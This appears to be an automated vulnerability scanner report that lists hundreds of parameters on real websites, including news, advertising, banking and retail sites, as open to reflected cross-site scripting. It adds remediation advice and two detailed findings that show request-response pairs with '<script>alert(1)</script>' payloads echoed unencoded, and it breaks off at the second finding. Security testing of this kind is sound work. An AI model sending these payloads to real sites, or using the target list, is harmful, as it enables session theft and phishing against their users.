http://events.nydailynews.com/partner_json/search [st parameter]
http://events.nydailynews.com/partner_json/search [when parameter]
http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 2]
http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 3]
http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 4]
http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 5]
http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 6]
http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 7]
http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [name of an arbitrarily supplied request parameter]
http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [sz parameter]
http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [REST URL parameter 2]
http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [REST URL parameter 3]
http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [REST URL parameter 4]
http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [REST URL parameter 5]
http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [aid parameter]
http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [c parameter]
http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [cid parameter]
http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [h parameter]
http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [js parameter]
http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [name of an arbitrarily supplied request parameter]
http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [pid parameter]
http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [plc parameter]
http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [w parameter]
http://ib.adnxs.com/ptj [redir parameter]
http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [imp_rvr_id parameter]
http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [mpck parameter]
http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [mpvc parameter]
http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [imp_rvr_id parameter]
http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [mpck parameter]
http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [mpvc parameter]
http://intensedebate.com/js/getCommentCounts.php [REST URL parameter 2]
http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php [REST URL parameter 2]
http://intensedebate.com/remoteVisit.php [REST URL parameter 1]
http://interface.q-go.net/rightnow/index.php [q parameter]
http://ips-invite.iperceptions.com/webValidator.aspx [cD parameter]
http://ips-invite.iperceptions.com/webValidator.aspx [loc parameter]
http://ips-invite.iperceptions.com/webValidator.aspx [loc parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
http://mads.techrepublic.com/mac-ad [ADREQ&beacon parameter]
http://mads.techrepublic.com/mac-ad [PAGESTATE parameter]
http://mads.techrepublic.com/mac-ad [SITE parameter]
http://ndparking.com/serve.php [REST URL parameter 1]
http://ndparking.com/serve.php [dn parameter]
http://ndparking.com/serve.php [name of an arbitrarily supplied request parameter]
http://oee.sandals.com/includes/calendar/formCalendar.cfm [targetRow parameter]
http://oee.sandals.com/includes/calendar/formCalendar.cfm [the_field parameter]
http://orders.allmenus.com/content/dfp.asp [position parameter]
http://origin.collective-media.net/adj/ns.informit/homepage [REST URL parameter 2]
http://origin.collective-media.net/adj/ns.informit/homepage [REST URL parameter 3]
http://origin.collective-media.net/adj/ns.informit/homepage [name of an arbitrarily supplied request parameter]
http://origin.collective-media.net/adj/ns.informit/homepage [ppos parameter]
http://picasaweb.google.com/data/feed/api/user/117176959269632963044/albumid/5461951393721719569 [hl parameter]
http://picasaweb.google.com/data/feed/api/user/117176959269632963044/albumid/5461951393721719569 [kind parameter]
http://picasaweb.google.com/data/feed/api/user/117176959269632963044/albumid/5547732855143429377 [hl parameter]
http://picasaweb.google.com/data/feed/api/user/117176959269632963044/albumid/5547732855143429377 [kind parameter]
http://pixel.fetchback.com/serve/fb/pdc [name parameter]
http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]
http://r.turn.com/server/pixel.htm [fpid parameter]
http://r.turn.com/server/pixel.htm [sp parameter]
http://realtime.active.com/widget/active_home [callback parameter]
http://rok.com.com/rok-get [app_handle parameter]
http://rok.com.com/rok-get [name of an arbitrarily supplied request parameter]
http://rok.com.com/rok-get [site parameter]
http://rok.com.com/rok-get [unit_sp parameter]
http://services.digg.com/1.0/endpoint [callback parameter]
http://services.digg.com/1.0/endpoint [method parameter]
http://services.digg.com/1.0/endpoint [name of an arbitrarily supplied request parameter]
http://services.digg.com/1.0/endpoint [type parameter]
http://sp1.convertro.com/trax/hit/echosign/0/ [cbi parameter]
http://sp1.convertro.com/trax/hit/echosign/0/ [typ parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]
http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]
http://twittercounter.com/embed/ [style parameter]
http://twittercounter.com/embed/ [username parameter]
http://widgets.active.com/widgets/nearyou/search [cb parameter]
http://widgets.digg.com/buttons/count [url parameter]
http://www.businesswire.com/news/home/20110606006390/en/eBay-Agrees-Acquire-Magento [REST URL parameter 3]
http://www.businesswire.com/news/home/20110606006390/en/eBay-Agrees-Acquire-Magento [REST URL parameter 4]
http://www.coldbox.org/about [REST URL parameter 1]
http://www.coldbox.org/download [REST URL parameter 1]
http://www.coldbox.org/download/extras [REST URL parameter 1]
http://www.coldbox.org/download/extras [REST URL parameter 2]
http://www.coldbox.org/downloads/searchplugin/coldboxsearch.xml [REST URL parameter 3]
http://www.coldbox.org/favicon.ico [REST URL parameter 1]
http://www.coldbox.org/includes/images/ColdfusionBuilder.jpg [REST URL parameter 3]
http://www.coldbox.org/includes/images/MessageBox.png [REST URL parameter 3]
http://www.coldbox.org/includes/infobox.css [REST URL parameter 2]
http://www.coldbox.org/includes/site.css [REST URL parameter 2]
http://www.coldbox.org/index.cfm/support/alliance [REST URL parameter 1]
http://www.coldbox.org/index.cfm/support/alliance [REST URL parameter 2]
http://www.coldbox.org/index.cfm/support/alliance [REST URL parameter 3]
http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_input.hidden_rf parameter]
http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_input.peopletravelling parameter]
http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_number_of_children parameter]
http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_number_of_rf parameter]
http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4! [PC_7_1_CKB_input.hidden_rf parameter]
http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4! [PC_7_1_CKB_input.peopletravelling parameter]
http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4! [PC_7_1_CKB_number_of_children parameter]
http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4! [PC_7_1_CKB_number_of_rf parameter]
https://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_input.hidden_rf parameter]
https://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_input.peopletravelling parameter]
https://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_number_of_children parameter]
https://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_number_of_rf parameter]
http://www.mvtimes.com/marthas-vineyard/article.php [name of an arbitrarily supplied request parameter]
http://www.mvtimes.com/marthas-vineyard/article.php [name of an arbitrarily supplied request parameter]
http://www.nations-baseball.com/index.cfm [event parameter]
http://www.northeastassembly.org/favicon.ico [REST URL parameter 1]
http://www.northeastassembly.org/includes/userfiles/flash/splash.swf [REST URL parameter 1]
http://www.northeastassembly.org/includes/userfiles/flash/splash.swf [REST URL parameter 2]
http://www.northeastassembly.org/includes/userfiles/flash/splash.swf [REST URL parameter 3]
http://www.northeastassembly.org/includes/userfiles/flash/splash.swf [REST URL parameter 4]
http://www.nydailynews.com/img/static/covers/backpage_cover.jpg [REST URL parameter 1]
http://www.nydailynews.com/img/static/covers/backpage_cover.jpg [REST URL parameter 2]
http://www.nydailynews.com/img/static/covers/backpage_cover.jpg [REST URL parameter 3]
http://www.nydailynews.com/img/static/covers/backpage_cover.jpg [REST URL parameter 4]
http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg [REST URL parameter 1]
http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg [REST URL parameter 2]
http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg [REST URL parameter 3]
http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg [REST URL parameter 4]
http://www.nydailynews.com/index.html [REST URL parameter 1]
http://www.nydailynews.com/news/index.html [REST URL parameter 1]
http://www.nydailynews.com/news/index.html [REST URL parameter 2]
http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 1]
http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 2]
http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 3]
http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 4]
http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 5]
http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 6]
http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [REST URL parameter 1]
http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [batchId parameter]
http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-id parameter]
http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-methodName parameter]
http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-scriptName parameter]
http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [callCount parameter]
http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 1]
http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 2]
http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 3]
http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 4]
http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 5]
http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 6]
http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 7]
http://www.nydailynews.com/sports/index.html [REST URL parameter 1]
http://www.nydailynews.com/sports/index.html [REST URL parameter 2]
http://www.opinionlab.com/content [name of an arbitrarily supplied request parameter]
http://www.opinionlab.com/content/ [name of an arbitrarily supplied request parameter]
http://www.rbisaleschallenge.com/ [name of an arbitrarily supplied request parameter]
http://www.rbisaleschallenge.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.rightnow.com/company-contact.php [REST URL parameter 1]
http://www.rightnow.com/company-contact.php [name of an arbitrarily supplied request parameter]
http://www.rightnow.com/cx.html [REST URL parameter 1]
http://www.rightnow.com/cx.html [name of an arbitrarily supplied request parameter]
http://www.rightnow.com/cx.php [REST URL parameter 1]
http://www.rightnow.com/cx.php [name of an arbitrarily supplied request parameter]
http://www.rightnow.com/favicon.ico [REST URL parameter 1]
http://www.rightnow.com/floatbox/graphics/loader_iframe_white.html [REST URL parameter 1]
http://www.rightnow.com/floatbox/graphics/loader_iframe_white.html [REST URL parameter 2]
http://www.rightnow.com/floatbox/graphics/loader_iframe_white.html [REST URL parameter 3]
http://www.rightnow.com/helvetica-bold-webfont.woff [REST URL parameter 1]
http://www.rightnow.com/helvetica-light-webfont.woff [REST URL parameter 1]
http://www.rightnow.com/helvetica-webfont.ttf [REST URL parameter 1]
http://www.rightnow.com/helvetica-webfont.woff [REST URL parameter 1]
http://www.rightnow.com/helvetica_bold-webfont.woff [REST URL parameter 1]
http://www.rightnow.com/helvetica_light-normal-webfont.woff [REST URL parameter 1]
http://www.rightnow.com/javascript/floatbox/floatbox.css [REST URL parameter 1]
http://www.rightnow.com/javascript/floatbox/floatbox.css [REST URL parameter 2]
http://www.rightnow.com/javascript/floatbox/floatbox.css [REST URL parameter 3]
http://www.rightnow.com/javascript/floatbox/floatbox.css [name of an arbitrarily supplied request parameter]
http://www.rightnow.com/javascript/floatbox/floatbox.js [REST URL parameter 1]
http://www.rightnow.com/javascript/floatbox/floatbox.js [REST URL parameter 2]
http://www.rightnow.com/javascript/floatbox/floatbox.js [REST URL parameter 3]
http://www.rightnow.com/javascript/floatbox/floatbox.js [name of an arbitrarily supplied request parameter]
http://www.rightnow.com/javascript/floatbox/options.js [REST URL parameter 1]
http://www.rightnow.com/javascript/floatbox/options.js [REST URL parameter 2]
http://www.rightnow.com/javascript/floatbox/options.js [REST URL parameter 3]
http://www.rightnow.com/javascript/floatbox/options.js [name of an arbitrarily supplied request parameter]
http://www.rightnow.com/javascript/form.110610.js [REST URL parameter 1]
http://www.rightnow.com/javascript/form.110610.js [REST URL parameter 2]
http://www.rightnow.com/javascript/form.110610.js [name of an arbitrarily supplied request parameter]
http://www.rightnow.com/javascript/omniture_variable_setup.js [REST URL parameter 1]
http://www.rightnow.com/javascript/omniture_variable_setup.js [REST URL parameter 2]
http://www.rightnow.com/javascript/omniture_variable_setup_part2.js [REST URL parameter 1]
http://www.rightnow.com/javascript/omniture_variable_setup_part2.js [REST URL parameter 2]
http://www.rightnow.com/javascript/ooyalabacklotapi.php [REST URL parameter 1]
http://www.rightnow.com/javascript/ooyalabacklotapi.php [REST URL parameter 2]
http://www.rightnow.com/javascript/rightnow.tv.player.swf [REST URL parameter 1]
http://www.rightnow.com/javascript/rightnow.tv.player.swf [REST URL parameter 2]
http://www.rightnow.com/javascript/s_code.js [REST URL parameter 1]
http://www.rightnow.com/javascript/s_code.js [REST URL parameter 2]
http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [REST URL parameter 1]
http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [REST URL parameter 2]
http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [REST URL parameter 3]
http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [name of an arbitrarily supplied request parameter]
http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [REST URL parameter 1]
http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [REST URL parameter 2]
http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [REST URL parameter 3]
http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [name of an arbitrarily supplied request parameter]
http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [REST URL parameter 1]
http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [REST URL parameter 2]
http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [REST URL parameter 3]
http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [name of an arbitrarily supplied request parameter]
http://www.rightnow.com/mobile.css [REST URL parameter 1]
http://www.rightnow.com/mobile.css [name of an arbitrarily supplied request parameter]
http://www.rightnow.com/rightnow_secondary.css [REST URL parameter 1]
http://www.rightnow.com/rightnow_secondary.css [name of an arbitrarily supplied request parameter]
http://www.rightnow.com/search/ [REST URL parameter 1]
http://www.rightnow.com/search/ [name of an arbitrarily supplied request parameter]
http://www.rightnow.com/search/ [q parameter]
http://www.rightnow.com/search/ [q parameter]
https://www.superinn.com/copy1/ResMain.asp [crypt parameter]
https://www.superinn.com/frametest.asp [dk parameter]
https://www.superinn.com/frametest.asp [nightnum parameter]
https://www.superinn.com/frametest.asp [nip parameter]
https://www.superinn.com/frametest.asp [propid parameter]
https://www.superinn.com/frametest.asp [rd parameter]
https://www.superinn.com/frametest.asp [rddate parameter]
https://www.superinn.com/frametest.asp [wrnum parameter]
https://www.zulily.com/index.php/customer/account/create/ [name of an arbitrarily supplied request parameter]
http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [Referer HTTP header]
http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [Referer HTTP header]
https://www.zulily.com/index.php/customer/account/create/ [Referer HTTP header]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

4.1. http://adsfac.us/ag.asp [cc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adsfac.us
Path:	/ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload 55836<script>alert(1)</script>67f7e0a0ca5 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=55836<script>alert(1)</script>67f7e0a0ca5&source=js&ord=2653272 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Wed, 31 Aug 2011 17:53:41 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FS55836%3Cscript%3Ealert%281%29%3C%2Fscript%3E67f7e0a0ca50=uid=29247451; expires=Thu, 01-Sep-2011 17:54:40 GMT; domain=.adsfac.us; path=/
Set-Cookie: FS55836%3Cscript%3Ealert%281%29%3C%2Fscript%3E67f7e0a0ca5=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4260&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Fri, 30-Sep-2011 17:54:40 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=983108392662652; expires=Fri, 30-Sep-2011 17:54:40 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Wed, 31 Aug 2011 17:54:41 GMT
Connection: close

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://adsfac.us/link.asp?cc=55836<script>alert(1)</script>67f7e0a0ca5.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

4.2. http://api.active.com/REST/ZipDma/zip/75244 [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.active.com
Path:	/REST/ZipDma/zip/75244

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 76cc7<script>alert(1)</script>76faf0c8b84 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /REST/ZipDma/zip/75244?output=json&callback=OX.AJAST.__callbacks__.callback376cc7<script>alert(1)</script>76faf0c8b84 HTTP/1.1
Host: api.active.com
Proxy-Connection: keep-alive
Referer: http://www.active.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mdr_browser=desktop; mbox=check#true#1314814843|session#1314814782356-141992#1314816643; geozip=75244

Response

